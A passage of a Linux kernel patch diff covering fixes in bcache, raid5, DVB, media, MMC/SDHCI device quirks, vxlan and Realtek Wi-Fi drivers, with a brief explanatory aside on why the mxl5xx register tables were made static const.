+@@ -979,7 +979,7 @@ void bch_sectors_dirty_init(struct bcache_device *d)
+ 	int i;
+ 	struct btree *b = NULL;
+ 	struct bkey *k = NULL;
+-	struct btree_iter iter;
++	struct btree_iter_stack iter;
+ 	struct sectors_dirty_init op;
+ 	struct cache_set *c = d->c;
+ 	struct bch_dirty_init_state state;
+diff --git a/drivers/md/raid5.c b/drivers/md/raid5.c
+index 8cf2317857e0a..ed99b449d8fd4 100644
+--- a/drivers/md/raid5.c
++++ b/drivers/md/raid5.c
+@@ -36,7 +36,6 @@
+  */
+ 
+ #include <linux/blkdev.h>
+-#include <linux/delay.h>
+ #include <linux/kthread.h>
+ #include <linux/raid/pq.h>
+ #include <linux/async_tx.h>
+@@ -6797,6 +6796,9 @@ static void raid5d(struct md_thread *thread)
+ 		int batch_size, released;
+ 		unsigned int offset;
+ 
++		if (test_bit(MD_SB_CHANGE_PENDING, &mddev->sb_flags))
++			break;
++
+ 		released = release_stripe_list(conf, conf->temp_inactive_list);
+ 		if (released)
+ 			clear_bit(R5_DID_ALLOC, &conf->cache_state);
+@@ -6833,18 +6835,7 @@ static void raid5d(struct md_thread *thread)
+ 			spin_unlock_irq(&conf->device_lock);
+ 			md_check_recovery(mddev);
+ 			spin_lock_irq(&conf->device_lock);
+-
+-			/*
+-			 * Waiting on MD_SB_CHANGE_PENDING below may deadlock
+-			 * seeing md_check_recovery() is needed to clear
+-			 * the flag when using mdmon.
+-			 */
+-			continue;
+ 		}
+-
+-		wait_event_lock_irq(mddev->sb_wait,
+-			!test_bit(MD_SB_CHANGE_PENDING, &mddev->sb_flags),
+-			conf->device_lock);
+ 	}
+ 	pr_debug("%d stripes handled\n", handled);
+ 
+diff --git a/drivers/media/dvb-frontends/lgdt3306a.c b/drivers/media/dvb-frontends/lgdt3306a.c
+index 6dfa8b18ed671..fccadfcd76bef 100644
+--- a/drivers/media/dvb-frontends/lgdt3306a.c
++++ b/drivers/media/dvb-frontends/lgdt3306a.c
+@@ -2177,6 +2177,11 @@ static int lgdt3306a_probe(struct i2c_client *client,
+ 	struct dvb_frontend *fe;
+ 	int ret;
+ 
++	if (!client->dev.platform_data) {
++		dev_err(&client->dev, "platform data is mandatory\n");
++		return -EINVAL;
++	}
++
+ 	config = kmemdup(client->dev.platform_data,
+ 			 sizeof(struct lgdt3306a_config), GFP_KERNEL);
+ 	if (config == NULL) {
+diff --git a/drivers/media/dvb-frontends/mxl5xx.c b/drivers/media/dvb-frontends/mxl5xx.c
+index 934d1c0b214ae..1adadad172c04 100644
+--- a/drivers/media/dvb-frontends/mxl5xx.c
++++ b/drivers/media/dvb-frontends/mxl5xx.c
+@@ -1381,57 +1381,57 @@ static int config_ts(struct mxl *state, enum MXL_HYDRA_DEMOD_ID_E demod_id,
+ 	u32 nco_count_min = 0;
+ 	u32 clk_type = 0;
+ 
+-	struct MXL_REG_FIELD_T xpt_sync_polarity[MXL_HYDRA_DEMOD_MAX] = {
++	static const struct MXL_REG_FIELD_T xpt_sync_polarity[MXL_HYDRA_DEMOD_MAX] = {
+ 		{0x90700010, 8, 1}, {0x90700010, 9, 1},
+ 		{0x90700010, 10, 1}, {0x90700010, 11, 1},
+ 		{0x90700010, 12, 1}, {0x90700010, 13, 1},
+ 		{0x90700010, 14, 1}, {0x90700010, 15, 1} };
+-	struct MXL_REG_FIELD_T xpt_clock_polarity[MXL_HYDRA_DEMOD_MAX] = {
++	static const struct MXL_REG_FIELD_T xpt_clock_polarity[MXL_HYDRA_DEMOD_MAX] = {
+ 		{0x90700010, 16, 1}, {0x90700010, 17, 1},
+ 		{0x90700010, 18, 1}, {0x90700010, 19, 1},
+ 		{0x90700010, 20, 1}, {0x90700010, 21, 1},
+ 		{0x90700010, 22, 1}, {0x90700010, 23, 1} };
+-	struct MXL_REG_FIELD_T xpt_valid_polarity[MXL_HYDRA_DEMOD_MAX] = {
++	static const struct MXL_REG_FIELD_T xpt_valid_polarity[MXL_HYDRA_DEMOD_MAX] = {
+ 		{0x90700014, 0, 1}, {0x90700014, 1, 1},
+ 		{0x90700014, 2, 1}, {0x90700014, 3, 1},
+ 		{0x90700014, 4, 1}, {0x90700014, 5, 1},
+ 		{0x90700014, 6, 1}, {0x90700014, 7, 1} };
+-	struct MXL_REG_FIELD_T xpt_ts_clock_phase[MXL_HYDRA_DEMOD_MAX] = {
++	static const struct MXL_REG_FIELD_T xpt_ts_clock_phase[MXL_HYDRA_DEMOD_MAX] = {
+ 		{0x90700018, 0, 3}, {0x90700018, 4, 3},
+ 		{0x90700018, 8, 3}, {0x90700018, 12, 3},
+ 		{0x90700018, 16, 3}, {0x90700018, 20, 3},
+ 		{0x90700018, 24, 3}, {0x90700018, 28, 3} };
+-	struct MXL_REG_FIELD_T xpt_lsb_first[MXL_HYDRA_DEMOD_MAX] = {
++	static const struct MXL_REG_FIELD_T xpt_lsb_first[MXL_HYDRA_DEMOD_MAX] = {
+ 		{0x9070000C, 16, 1}, {0x9070000C, 17, 1},
+ 		{0x9070000C, 18, 1}, {0x9070000C, 19, 1},
+ 		{0x9070000C, 20, 1}, {0x9070000C, 21, 1},
+ 		{0x9070000C, 22, 1}, {0x9070000C, 23, 1} };
+-	struct MXL_REG_FIELD_T xpt_sync_byte[MXL_HYDRA_DEMOD_MAX] = {
++	static const struct MXL_REG_FIELD_T xpt_sync_byte[MXL_HYDRA_DEMOD_MAX] = {
+ 		{0x90700010, 0, 1}, {0x90700010, 1, 1},
+ 		{0x90700010, 2, 1}, {0x90700010, 3, 1},
+ 		{0x90700010, 4, 1}, {0x90700010, 5, 1},
+ 		{0x90700010, 6, 1}, {0x90700010, 7, 1} };
+-	struct MXL_REG_FIELD_T xpt_enable_output[MXL_HYDRA_DEMOD_MAX] = {
++	static const struct MXL_REG_FIELD_T xpt_enable_output[MXL_HYDRA_DEMOD_MAX] = {
+ 		{0x9070000C, 0, 1}, {0x9070000C, 1, 1},
+ 		{0x9070000C, 2, 1}, {0x9070000C, 3, 1},
+ 		{0x9070000C, 4, 1}, {0x9070000C, 5, 1},
+ 		{0x9070000C, 6, 1}, {0x9070000C, 7, 1} };
+-	struct MXL_REG_FIELD_T xpt_err_replace_sync[MXL_HYDRA_DEMOD_MAX] = {
++	static const struct MXL_REG_FIELD_T xpt_err_replace_sync[MXL_HYDRA_DEMOD_MAX] = {
+ 		{0x9070000C, 24, 1}, {0x9070000C, 25, 1},
+ 		{0x9070000C, 26, 1}, {0x9070000C, 27, 1},
+ 		{0x9070000C, 28, 1}, {0x9070000C, 29, 1},
+ 		{0x9070000C, 30, 1}, {0x9070000C, 31, 1} };
+-	struct MXL_REG_FIELD_T xpt_err_replace_valid[MXL_HYDRA_DEMOD_MAX] = {
++	static const struct MXL_REG_FIELD_T xpt_err_replace_valid[MXL_HYDRA_DEMOD_MAX] = {
+ 		{0x90700014, 8, 1}, {0x90700014, 9, 1},
+ 		{0x90700014, 10, 1}, {0x90700014, 11, 1},
+ 		{0x90700014, 12, 1}, {0x90700014, 13, 1},
+ 		{0x90700014, 14, 1}, {0x90700014, 15, 1} };
+-	struct MXL_REG_FIELD_T xpt_continuous_clock[MXL_HYDRA_DEMOD_MAX] = {
++	static const struct MXL_REG_FIELD_T xpt_continuous_clock[MXL_HYDRA_DEMOD_MAX] = {
+ 		{0x907001D4, 0, 1}, {0x907001D4, 1, 1},
+ 		{0x907001D4, 2, 1}, {0x907001D4, 3, 1},
+ 		{0x907001D4, 4, 1}, {0x907001D4, 5, 1},
+ 		{0x907001D4, 6, 1}, {0x907001D4, 7, 1} };
+-	struct MXL_REG_FIELD_T xpt_nco_clock_rate[MXL_HYDRA_DEMOD_MAX] = {
++	static const struct MXL_REG_FIELD_T xpt_nco_clock_rate[MXL_HYDRA_DEMOD_MAX] = {
+ 		{0x90700044, 16, 80}, {0x90700044, 16, 81},
+ 		{0x90700044, 16, 82}, {0x90700044, 16, 83},
+ 		{0x90700044, 16, 84}, {0x90700044, 16, 85},
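The static const conversions in config_ts() are about stack, not
correctness: a non-static const array with an initializer has automatic
storage and is materialized in the stack frame on every call, and this
function carries ten such 8-entry tables. With static const they live
once in .rodata. Userspace sketch:

#include <stdio.h>

struct field { unsigned int reg; unsigned char lsb, width; };

static unsigned int first_reg(void)
{
	/* One .rodata copy; without `static` this initializer would be
	 * rebuilt in the stack frame on each call. */
	static const struct field sync_polarity[8] = {
		{0x90700010, 8, 1}, {0x90700010, 9, 1},
		{0x90700010, 10, 1}, {0x90700010, 11, 1},
		{0x90700010, 12, 1}, {0x90700010, 13, 1},
		{0x90700010, 14, 1}, {0x90700010, 15, 1},
	};

	return sync_polarity[0].reg;
}

int main(void)
{
	printf("0x%x\n", first_reg());
	return 0;
}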
+diff --git a/drivers/media/mc/mc-devnode.c b/drivers/media/mc/mc-devnode.c
+index 680fbb3a93402..94abd042045da 100644
+--- a/drivers/media/mc/mc-devnode.c
++++ b/drivers/media/mc/mc-devnode.c
+@@ -246,15 +246,14 @@ int __must_check media_devnode_register(struct media_device *mdev,
+ 	kobject_set_name(&devnode->cdev.kobj, "media%d", devnode->minor);
+ 
+ 	/* Part 3: Add the media and char device */
++	set_bit(MEDIA_FLAG_REGISTERED, &devnode->flags);
+ 	ret = cdev_device_add(&devnode->cdev, &devnode->dev);
+ 	if (ret < 0) {
++		clear_bit(MEDIA_FLAG_REGISTERED, &devnode->flags);
+ 		pr_err("%s: cdev_device_add failed\n", __func__);
+ 		goto cdev_add_error;
+ 	}
+ 
+-	/* Part 4: Activate this minor. The char device can now be used. */
+-	set_bit(MEDIA_FLAG_REGISTERED, &devnode->flags);
+-
+ 	return 0;
+ 
+ cdev_add_error:
+diff --git a/drivers/media/mc/mc-entity.c b/drivers/media/mc/mc-entity.c
+index 8919df09e3e8d..bdb8f512be578 100644
+--- a/drivers/media/mc/mc-entity.c
++++ b/drivers/media/mc/mc-entity.c
+@@ -593,6 +593,12 @@ static int media_pipeline_explore_next_link(struct media_pipeline *pipe,
+ 	link = list_entry(entry->links, typeof(*link), list);
+ 	last_link = media_pipeline_walk_pop(walk);
+ 
++	if ((link->flags & MEDIA_LNK_FL_LINK_TYPE) != MEDIA_LNK_FL_DATA_LINK) {
++		dev_dbg(walk->mdev->dev,
++			"media pipeline: skipping link (not data-link)\n");
++		return 0;
++	}
++
+ 	dev_dbg(walk->mdev->dev,
+ 		"media pipeline: exploring link '%s':%u -> '%s':%u\n",
+ 		link->source->entity->name, link->source->index,
+diff --git a/drivers/media/v4l2-core/v4l2-dev.c b/drivers/media/v4l2-core/v4l2-dev.c
+index 397d553177fa7..e73c749c99bd5 100644
+--- a/drivers/media/v4l2-core/v4l2-dev.c
++++ b/drivers/media/v4l2-core/v4l2-dev.c
+@@ -1033,8 +1033,10 @@ int __video_register_device(struct video_device *vdev,
+ 	vdev->dev.devt = MKDEV(VIDEO_MAJOR, vdev->minor);
+ 	vdev->dev.parent = vdev->dev_parent;
+ 	dev_set_name(&vdev->dev, "%s%d", name_base, vdev->num);
++	mutex_lock(&videodev_lock);
+ 	ret = device_register(&vdev->dev);
+ 	if (ret < 0) {
++		mutex_unlock(&videodev_lock);
+ 		pr_err("%s: device_register failed\n", __func__);
+ 		goto cleanup;
+ 	}
+@@ -1054,6 +1056,7 @@ int __video_register_device(struct video_device *vdev,
+ 
+ 	/* Part 6: Activate this minor. The char device can now be used. */
+ 	set_bit(V4L2_FL_REGISTERED, &vdev->flags);
++	mutex_unlock(&videodev_lock);
+ 
+ 	return 0;
+ 
+diff --git a/drivers/mmc/core/host.c b/drivers/mmc/core/host.c
+index 25c152ef5d60e..67230d486c283 100644
+--- a/drivers/mmc/core/host.c
++++ b/drivers/mmc/core/host.c
+@@ -119,13 +119,12 @@ void mmc_retune_enable(struct mmc_host *host)
+ 
+ /*
+  * Pause re-tuning for a small set of operations.  The pause begins after the
+- * next command and after first doing re-tuning.
++ * next command.
+  */
+ void mmc_retune_pause(struct mmc_host *host)
+ {
+ 	if (!host->retune_paused) {
+ 		host->retune_paused = 1;
+-		mmc_retune_needed(host);
+ 		mmc_retune_hold(host);
+ 	}
+ }
+diff --git a/drivers/mmc/core/slot-gpio.c b/drivers/mmc/core/slot-gpio.c
+index e3c69c6b85a6c..d5145c1ee81e7 100644
+--- a/drivers/mmc/core/slot-gpio.c
++++ b/drivers/mmc/core/slot-gpio.c
+@@ -206,6 +206,26 @@ int mmc_gpiod_request_cd(struct mmc_host *host, const char *con_id,
+ }
+ EXPORT_SYMBOL(mmc_gpiod_request_cd);
+ 
++/**
++ * mmc_gpiod_set_cd_config - set config for card-detection GPIO
++ * @host: mmc host
++ * @config: Generic pinconf config (from pinconf_to_config_packed())
++ *
++ * This can be used by mmc host drivers to fix up a card-detection GPIO's config
++ * (e.g. set PIN_CONFIG_BIAS_PULL_UP) after acquiring the GPIO descriptor
++ * through mmc_gpiod_request_cd().
++ *
++ * Returns:
++ * 0 on success, or a negative errno value on error.
++ */
++int mmc_gpiod_set_cd_config(struct mmc_host *host, unsigned long config)
++{
++	struct mmc_gpio *ctx = host->slot.handler_priv;
++
++	return gpiod_set_config(ctx->cd_gpio, config);
++}
++EXPORT_SYMBOL(mmc_gpiod_set_cd_config);
++
+ bool mmc_can_gpio_cd(struct mmc_host *host)
+ {
+ 	struct mmc_gpio *ctx = host->slot.handler_priv;
+diff --git a/drivers/mmc/host/sdhci-acpi.c b/drivers/mmc/host/sdhci-acpi.c
+index b917060a258a4..eea0a7ddb5514 100644
+--- a/drivers/mmc/host/sdhci-acpi.c
++++ b/drivers/mmc/host/sdhci-acpi.c
+@@ -10,6 +10,7 @@
+ #include <linux/export.h>
+ #include <linux/module.h>
+ #include <linux/device.h>
++#include <linux/pinctrl/pinconf-generic.h>
+ #include <linux/platform_device.h>
+ #include <linux/ioport.h>
+ #include <linux/io.h>
+@@ -80,6 +81,8 @@ struct sdhci_acpi_host {
+ enum {
+ 	DMI_QUIRK_RESET_SD_SIGNAL_VOLT_ON_SUSP			= BIT(0),
+ 	DMI_QUIRK_SD_NO_WRITE_PROTECT				= BIT(1),
++	DMI_QUIRK_SD_CD_ACTIVE_HIGH				= BIT(2),
++	DMI_QUIRK_SD_CD_ENABLE_PULL_UP				= BIT(3),
+ };
+ 
+ static inline void *sdhci_acpi_priv(struct sdhci_acpi_host *c)
+@@ -719,7 +722,28 @@ static const struct acpi_device_id sdhci_acpi_ids[] = {
+ };
+ MODULE_DEVICE_TABLE(acpi, sdhci_acpi_ids);
+ 
++/* Please keep this list sorted alphabetically */
+ static const struct dmi_system_id sdhci_acpi_quirks[] = {
++	{
++		/*
++		 * The Acer Aspire Switch 10 (SW5-012) microSD slot always
++		 * reports the card being write-protected even though microSD
++		 * cards do not have a write-protect switch at all.
++		 */
++		.matches = {
++			DMI_MATCH(DMI_SYS_VENDOR, "Acer"),
++			DMI_MATCH(DMI_PRODUCT_NAME, "Aspire SW5-012"),
++		},
++		.driver_data = (void *)DMI_QUIRK_SD_NO_WRITE_PROTECT,
++	},
++	{
++		/* Asus T100TA: needs a pull-up for CD, but DSDT GpioInt has NoPull set */
++		.matches = {
++			DMI_MATCH(DMI_SYS_VENDOR, "ASUSTeK COMPUTER INC."),
++			DMI_MATCH(DMI_PRODUCT_NAME, "T100TA"),
++		},
++		.driver_data = (void *)DMI_QUIRK_SD_CD_ENABLE_PULL_UP,
++	},
+ 	{
+ 		/*
+ 		 * The Lenovo Miix 320-10ICR has a bug in the _PS0 method of
+@@ -736,15 +760,23 @@ static const struct dmi_system_id sdhci_acpi_quirks[] = {
+ 	},
+ 	{
+ 		/*
+-		 * The Acer Aspire Switch 10 (SW5-012) microSD slot always
+-		 * reports the card being write-protected even though microSD
+-		 * cards do not have a write-protect switch at all.
++		 * The Lenovo Yoga Tablet 2 Pro 1380F/L (13" Android version)
++		 * has broken WP reporting and an inverted CD signal.
++		 * Note this has more or less the same BIOS as the Lenovo Yoga
++		 * Tablet 2 830F/L or 1050F/L (8" and 10" Android), but unlike
++		 * the 830 / 1050 models, which share the same mainboard, this
++		 * model has a different mainboard; the inverted CD and
++		 * broken WP are unique to this board.
+ 		 */
+ 		.matches = {
+-			DMI_MATCH(DMI_SYS_VENDOR, "Acer"),
+-			DMI_MATCH(DMI_PRODUCT_NAME, "Aspire SW5-012"),
++			DMI_MATCH(DMI_SYS_VENDOR, "Intel Corp."),
++			DMI_MATCH(DMI_PRODUCT_NAME, "VALLEYVIEW C0 PLATFORM"),
++			DMI_MATCH(DMI_BOARD_NAME, "BYT-T FFD8"),
++			/* Full match so as to NOT match the 830/1050 BIOS */
++			DMI_MATCH(DMI_BIOS_VERSION, "BLADE_21.X64.0005.R00.1504101516"),
+ 		},
+-		.driver_data = (void *)DMI_QUIRK_SD_NO_WRITE_PROTECT,
++		.driver_data = (void *)(DMI_QUIRK_SD_NO_WRITE_PROTECT |
++					DMI_QUIRK_SD_CD_ACTIVE_HIGH),
+ 	},
+ 	{
+ 		/*
+@@ -757,6 +789,17 @@ static const struct dmi_system_id sdhci_acpi_quirks[] = {
+ 		},
+ 		.driver_data = (void *)DMI_QUIRK_SD_NO_WRITE_PROTECT,
+ 	},
++	{
++		/*
++		 * The Toshiba WT10-A's microSD slot always reports the card being
++		 * write-protected.
++		 */
++		.matches = {
++			DMI_MATCH(DMI_SYS_VENDOR, "TOSHIBA"),
++			DMI_MATCH(DMI_PRODUCT_NAME, "TOSHIBA WT10-A"),
++		},
++		.driver_data = (void *)DMI_QUIRK_SD_NO_WRITE_PROTECT,
++	},
+ 	{} /* Terminating entry */
+ };
+ 
+@@ -866,12 +909,18 @@ static int sdhci_acpi_probe(struct platform_device *pdev)
+ 	if (sdhci_acpi_flag(c, SDHCI_ACPI_SD_CD)) {
+ 		bool v = sdhci_acpi_flag(c, SDHCI_ACPI_SD_CD_OVERRIDE_LEVEL);
+ 
++		if (quirks & DMI_QUIRK_SD_CD_ACTIVE_HIGH)
++			host->mmc->caps2 |= MMC_CAP2_CD_ACTIVE_HIGH;
++
+ 		err = mmc_gpiod_request_cd(host->mmc, NULL, 0, v, 0);
+ 		if (err) {
+ 			if (err == -EPROBE_DEFER)
+ 				goto err_free;
+ 			dev_warn(dev, "failed to setup card detect gpio\n");
+ 			c->use_runtime_pm = false;
++		} else if (quirks & DMI_QUIRK_SD_CD_ENABLE_PULL_UP) {
++			mmc_gpiod_set_cd_config(host->mmc,
++						PIN_CONF_PACKED(PIN_CONFIG_BIAS_PULL_UP, 20000));
+ 		}
+ 
+ 		if (quirks & DMI_QUIRK_RESET_SD_SIGNAL_VOLT_ON_SUSP)
+diff --git a/drivers/mmc/host/sdhci.c b/drivers/mmc/host/sdhci.c
+index ad73d528a1bd4..111f7c6770605 100644
+--- a/drivers/mmc/host/sdhci.c
++++ b/drivers/mmc/host/sdhci.c
+@@ -3466,12 +3466,18 @@ static void sdhci_data_irq(struct sdhci_host *host, u32 intmask)
+ 		host->data->error = -EILSEQ;
+ 		if (!mmc_op_tuning(SDHCI_GET_CMD(sdhci_readw(host, SDHCI_COMMAND))))
+ 			sdhci_err_stats_inc(host, DAT_CRC);
+-	} else if ((intmask & SDHCI_INT_DATA_CRC) &&
++	} else if ((intmask & (SDHCI_INT_DATA_CRC | SDHCI_INT_TUNING_ERROR)) &&
+ 		SDHCI_GET_CMD(sdhci_readw(host, SDHCI_COMMAND))
+ 			!= MMC_BUS_TEST_R) {
+ 		host->data->error = -EILSEQ;
+ 		if (!mmc_op_tuning(SDHCI_GET_CMD(sdhci_readw(host, SDHCI_COMMAND))))
+ 			sdhci_err_stats_inc(host, DAT_CRC);
++		if (intmask & SDHCI_INT_TUNING_ERROR) {
++			u16 ctrl2 = sdhci_readw(host, SDHCI_HOST_CONTROL2);
++
++			ctrl2 &= ~SDHCI_CTRL_TUNED_CLK;
++			sdhci_writew(host, ctrl2, SDHCI_HOST_CONTROL2);
++		}
+ 	} else if (intmask & SDHCI_INT_ADMA_ERROR) {
+ 		pr_err("%s: ADMA error: 0x%08x\n", mmc_hostname(host->mmc),
+ 		       intmask);
+@@ -4006,7 +4012,7 @@ bool sdhci_cqe_irq(struct sdhci_host *host, u32 intmask, int *cmd_error,
+ 	} else
+ 		*cmd_error = 0;
+ 
+-	if (intmask & (SDHCI_INT_DATA_END_BIT | SDHCI_INT_DATA_CRC)) {
++	if (intmask & (SDHCI_INT_DATA_END_BIT | SDHCI_INT_DATA_CRC | SDHCI_INT_TUNING_ERROR)) {
+ 		*data_error = -EILSEQ;
+ 		if (!mmc_op_tuning(SDHCI_GET_CMD(sdhci_readw(host, SDHCI_COMMAND))))
+ 			sdhci_err_stats_inc(host, DAT_CRC);
+diff --git a/drivers/mmc/host/sdhci.h b/drivers/mmc/host/sdhci.h
+index 5ce7cdcc192fd..901482d5e73f7 100644
+--- a/drivers/mmc/host/sdhci.h
++++ b/drivers/mmc/host/sdhci.h
+@@ -151,6 +151,7 @@
+ #define  SDHCI_INT_BUS_POWER	0x00800000
+ #define  SDHCI_INT_AUTO_CMD_ERR	0x01000000
+ #define  SDHCI_INT_ADMA_ERROR	0x02000000
++#define  SDHCI_INT_TUNING_ERROR	0x04000000
+ 
+ #define  SDHCI_INT_NORMAL_MASK	0x00007FFF
+ #define  SDHCI_INT_ERROR_MASK	0xFFFF8000
+@@ -162,7 +163,7 @@
+ 		SDHCI_INT_DATA_AVAIL | SDHCI_INT_SPACE_AVAIL | \
+ 		SDHCI_INT_DATA_TIMEOUT | SDHCI_INT_DATA_CRC | \
+ 		SDHCI_INT_DATA_END_BIT | SDHCI_INT_ADMA_ERROR | \
+-		SDHCI_INT_BLK_GAP)
++		SDHCI_INT_BLK_GAP | SDHCI_INT_TUNING_ERROR)
+ #define SDHCI_INT_ALL_MASK	((unsigned int)-1)
+ 
+ #define SDHCI_CQE_INT_ERR_MASK ( \
+diff --git a/drivers/net/vxlan/vxlan_core.c b/drivers/net/vxlan/vxlan_core.c
+index 01ce289f4abf0..a7ae68f490c4c 100644
+--- a/drivers/net/vxlan/vxlan_core.c
++++ b/drivers/net/vxlan/vxlan_core.c
+@@ -1662,10 +1662,6 @@ static bool vxlan_set_mac(struct vxlan_dev *vxlan,
+ 	if (ether_addr_equal(eth_hdr(skb)->h_source, vxlan->dev->dev_addr))
+ 		return false;
+ 
+-	/* Ignore packets from invalid src-address */
+-	if (!is_valid_ether_addr(eth_hdr(skb)->h_source))
+-		return false;
+-
+ 	/* Get address from the outer IP header */
+ 	if (vxlan_get_sk_family(vs) == AF_INET) {
+ 		saddr.sin.sin_addr.s_addr = ip_hdr(skb)->saddr;
+diff --git a/drivers/net/wireless/realtek/rtl8xxxu/rtl8xxxu_core.c b/drivers/net/wireless/realtek/rtl8xxxu/rtl8xxxu_core.c
+index ccac47dd781d6..9ccf8550a0679 100644
+--- a/drivers/net/wireless/realtek/rtl8xxxu/rtl8xxxu_core.c
++++ b/drivers/net/wireless/realtek/rtl8xxxu/rtl8xxxu_core.c
+@@ -1389,13 +1389,13 @@ rtl8xxxu_gen1_set_tx_power(struct rtl8xxxu_priv *priv, int channel, bool ht40)
+ 	u8 cck[RTL8723A_MAX_RF_PATHS], ofdm[RTL8723A_MAX_RF_PATHS];
+ 	u8 ofdmbase[RTL8723A_MAX_RF_PATHS], mcsbase[RTL8723A_MAX_RF_PATHS];
+ 	u32 val32, ofdm_a, ofdm_b, mcs_a, mcs_b;
+-	u8 val8;
++	u8 val8, base;
+ 	int group, i;
+ 
+ 	group = rtl8xxxu_gen1_channel_to_group(channel);
+ 
+-	cck[0] = priv->cck_tx_power_index_A[group] - 1;
+-	cck[1] = priv->cck_tx_power_index_B[group] - 1;
++	cck[0] = priv->cck_tx_power_index_A[group];
++	cck[1] = priv->cck_tx_power_index_B[group];
+ 
+ 	if (priv->hi_pa) {
+ 		if (cck[0] > 0x20)
+@@ -1406,10 +1406,6 @@ rtl8xxxu_gen1_set_tx_power(struct rtl8xxxu_priv *priv, int channel, bool ht40)
+ 
+ 	ofdm[0] = priv->ht40_1s_tx_power_index_A[group];
+ 	ofdm[1] = priv->ht40_1s_tx_power_index_B[group];
+-	if (ofdm[0])
+-		ofdm[0] -= 1;
+-	if (ofdm[1])
+-		ofdm[1] -= 1;
+ 
+ 	ofdmbase[0] = ofdm[0] +	priv->ofdm_tx_power_index_diff[group].a;
+ 	ofdmbase[1] = ofdm[1] +	priv->ofdm_tx_power_index_diff[group].b;
+@@ -1498,20 +1494,19 @@ rtl8xxxu_gen1_set_tx_power(struct rtl8xxxu_priv *priv, int channel, bool ht40)
+ 
+ 	rtl8xxxu_write32(priv, REG_TX_AGC_A_MCS15_MCS12,
+ 			 mcs_a + power_base->reg_0e1c);
++	val8 = u32_get_bits(mcs_a + power_base->reg_0e1c, 0xff000000);
+ 	for (i = 0; i < 3; i++) {
+-		if (i != 2)
+-			val8 = (mcsbase[0] > 8) ? (mcsbase[0] - 8) : 0;
+-		else
+-			val8 = (mcsbase[0] > 6) ? (mcsbase[0] - 6) : 0;
++		base = i != 2 ? 8 : 6;
++		val8 = max_t(int, val8 - base, 0);
+ 		rtl8xxxu_write8(priv, REG_OFDM0_XC_TX_IQ_IMBALANCE + i, val8);
+ 	}
++
+ 	rtl8xxxu_write32(priv, REG_TX_AGC_B_MCS15_MCS12,
+ 			 mcs_b + power_base->reg_0868);
++	val8 = u32_get_bits(mcs_b + power_base->reg_0868, 0xff000000);
+ 	for (i = 0; i < 3; i++) {
+-		if (i != 2)
+-			val8 = (mcsbase[1] > 8) ? (mcsbase[1] - 8) : 0;
+-		else
+-			val8 = (mcsbase[1] > 6) ? (mcsbase[1] - 6) : 0;
++		base = i != 2 ? 8 : 6;
++		val8 = max_t(int, val8 - base, 0);
+ 		rtl8xxxu_write8(priv, REG_OFDM0_XD_TX_IQ_IMBALANCE + i, val8);
+ 	}
+ }
+diff --git a/drivers/net/wireless/realtek/rtlwifi/rtl8192de/phy.c b/drivers/net/wireless/realtek/rtlwifi/rtl8192de/phy.c
+index d835a27429f0f..56b5cd032a9ac 100644
+--- a/drivers/net/wireless/realtek/rtlwifi/rtl8192de/phy.c
++++ b/drivers/net/wireless/realtek/rtlwifi/rtl8192de/phy.c
+@@ -892,8 +892,8 @@ static u8 _rtl92c_phy_get_rightchnlplace(u8 chnl)
+ 	u8 place = chnl;
+ 
+ 	if (chnl > 14) {
+-		for (place = 14; place < ARRAY_SIZE(channel5g); place++) {
+-			if (channel5g[place] == chnl) {
++		for (place = 14; place < ARRAY_SIZE(channel_all); place++) {
++			if (channel_all[place] == chnl) {
+ 				place++;
+ 				break;
+ 			}
+diff --git a/drivers/net/wireless/realtek/rtlwifi/rtl8192de/trx.c b/drivers/net/wireless/realtek/rtlwifi/rtl8192de/trx.c
+index 807b66c16e111..b1456fb921c2f 100644
+--- a/drivers/net/wireless/realtek/rtlwifi/rtl8192de/trx.c
++++ b/drivers/net/wireless/realtek/rtlwifi/rtl8192de/trx.c
+@@ -35,7 +35,7 @@ static long _rtl92de_translate_todbm(struct ieee80211_hw *hw,
+ 
+ static void _rtl92de_query_rxphystatus(struct ieee80211_hw *hw,
+ 				       struct rtl_stats *pstats,
+-				       struct rx_desc_92d *pdesc,
++				       __le32 *pdesc,
+ 				       struct rx_fwinfo_92d *p_drvinfo,
+ 				       bool packet_match_bssid,
+ 				       bool packet_toself,
+@@ -49,8 +49,10 @@ static void _rtl92de_query_rxphystatus(struct ieee80211_hw *hw,
+ 	u8 i, max_spatial_stream;
+ 	u32 rssi, total_rssi = 0;
+ 	bool is_cck_rate;
++	u8 rxmcs;
+ 
+-	is_cck_rate = RX_HAL_IS_CCK_RATE(pdesc->rxmcs);
++	rxmcs = get_rx_desc_rxmcs(pdesc);
++	is_cck_rate = rxmcs <= DESC_RATE11M;
+ 	pstats->packet_matchbssid = packet_match_bssid;
+ 	pstats->packet_toself = packet_toself;
+ 	pstats->packet_beacon = packet_beacon;
+@@ -158,8 +160,8 @@ static void _rtl92de_query_rxphystatus(struct ieee80211_hw *hw,
+ 		pstats->rx_pwdb_all = pwdb_all;
+ 		pstats->rxpower = rx_pwr_all;
+ 		pstats->recvsignalpower = rx_pwr_all;
+-		if (pdesc->rxht && pdesc->rxmcs >= DESC_RATEMCS8 &&
+-		    pdesc->rxmcs <= DESC_RATEMCS15)
++		if (get_rx_desc_rxht(pdesc) && rxmcs >= DESC_RATEMCS8 &&
++		    rxmcs <= DESC_RATEMCS15)
+ 			max_spatial_stream = 2;
+ 		else
+ 			max_spatial_stream = 1;
+@@ -365,7 +367,7 @@ static void _rtl92de_process_phyinfo(struct ieee80211_hw *hw,
+ static void _rtl92de_translate_rx_signal_stuff(struct ieee80211_hw *hw,
+ 					       struct sk_buff *skb,
+ 					       struct rtl_stats *pstats,
+-					       struct rx_desc_92d *pdesc,
++					       __le32 *pdesc,
+ 					       struct rx_fwinfo_92d *p_drvinfo)
+ {
+ 	struct rtl_mac *mac = rtl_mac(rtl_priv(hw));
+@@ -414,7 +416,8 @@ bool rtl92de_rx_query_desc(struct ieee80211_hw *hw,	struct rtl_stats *stats,
+ 	stats->icv = (u16)get_rx_desc_icv(pdesc);
+ 	stats->crc = (u16)get_rx_desc_crc32(pdesc);
+ 	stats->hwerror = (stats->crc | stats->icv);
+-	stats->decrypted = !get_rx_desc_swdec(pdesc);
++	stats->decrypted = !get_rx_desc_swdec(pdesc) &&
++			   get_rx_desc_enc_type(pdesc) != RX_DESC_ENC_NONE;
+ 	stats->rate = (u8)get_rx_desc_rxmcs(pdesc);
+ 	stats->shortpreamble = (u16)get_rx_desc_splcp(pdesc);
+ 	stats->isampdu = (bool)(get_rx_desc_paggr(pdesc) == 1);
+@@ -427,8 +430,6 @@ bool rtl92de_rx_query_desc(struct ieee80211_hw *hw,	struct rtl_stats *stats,
